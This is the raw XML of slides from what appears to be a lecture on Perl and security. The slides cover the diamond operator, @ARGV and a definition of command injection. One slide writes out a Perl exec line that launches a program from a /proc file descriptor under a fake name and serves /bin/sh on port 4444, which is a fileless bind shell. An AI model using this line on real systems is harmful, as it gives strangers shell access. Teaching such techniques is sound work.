                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/write: $!/;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>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36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Explanation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Stuart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="手繪多邊形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8798560" y="3007360"/>
            <a:ext cx="10160" cy="1178560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10160"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1178560"/>
              <a:gd name="connsiteX1" fmla="*/ 10160 w 10160"/>
              <a:gd name="connsiteY1" fmla="*/ 1178560 h 1178560"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10160" h="1178560">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3387" y="392853"/>
                  <a:pt x="6773" y="785707"/>
                  <a:pt x="10160" y="1178560"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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手繪多邊形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="40640" y="2357120"/>
            <a:ext cx="4785360" cy="1869440"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 4785360 w 4785360"/>
              <a:gd name="connsiteY0" fmla="*/ 314960 h 1869440"/>
              <a:gd name="connsiteX1" fmla="*/ 4785360 w 4785360"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1869440"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 4785360"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1869440"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4785360"/>
              <a:gd name="connsiteY3" fmla="*/ 1524000 h 1869440"/>
              <a:gd name="connsiteX4" fmla="*/ 975360 w 4785360"/>
              <a:gd name="connsiteY4" fmla="*/ 1524000 h 1869440"/>
              <a:gd name="connsiteX5" fmla="*/ 975360 w 4785360"/>
              <a:gd name="connsiteY5" fmla="*/ 1869440 h 1869440"/>
              <a:gd name="connsiteX6" fmla="*/ 965200 w 4785360"/>
              <a:gd name="connsiteY6" fmla="*/ 1869440 h 1869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5360" h="1869440">
                <a:moveTo>
                  <a:pt x="4785360" y="314960"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4785360" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1524000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="975360" y="1524000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="975360" y="1869440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="965200" y="1869440"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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99786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5" y="2636912"/>
            <a:ext cx="8928991" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Diamond operator is almost exclusively used in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-loop. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>allows us to iterate over the rows in all the files given on the command line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> reaches the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> the first time it looks at the content of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>@ARGV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> that, by default, contains the values passed on the command line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>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37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Diamond </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Operator (1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Gabor Szabo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23445221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786616"/>
            <a:ext cx="8568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>shifts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> the first element to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ARGV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> scalar variable, opens the file that has its name in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ARGV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and reads in the first line.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Subsequent encounters with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> will read in subsequent lines of the same file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>After the last line was read in from the current file, the next encounter with the diamond operator will repeat the above operation starting by shifting the first value from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@ARGV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ARGV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If there are no more entries in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@ARGV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> array, the diamond operator will return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>undef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> loop will exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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38</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Diamond Operator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Gabor Szabo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335301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D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Execution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>itw01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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284984"/>
            <a:ext cx="8908486" cy="1895078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="770360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en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Command injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>system shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>injection attacks are possible largely due to insufficient input validation.</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4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Weilin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Zhong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9415207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dirty="0" smtClean="0"/>
              <a:t>Part 3</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40</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5852956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2675467"/>
            <a:ext cx="8712967" cy="609517"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {"/proc/$$/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"} "kittens", "-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kvl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "4444", "-e", "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" or die "exec: $!"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>itw01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="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632" y="3656323"/>
            <a:ext cx="6985000" cy="2222500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14314276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3600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
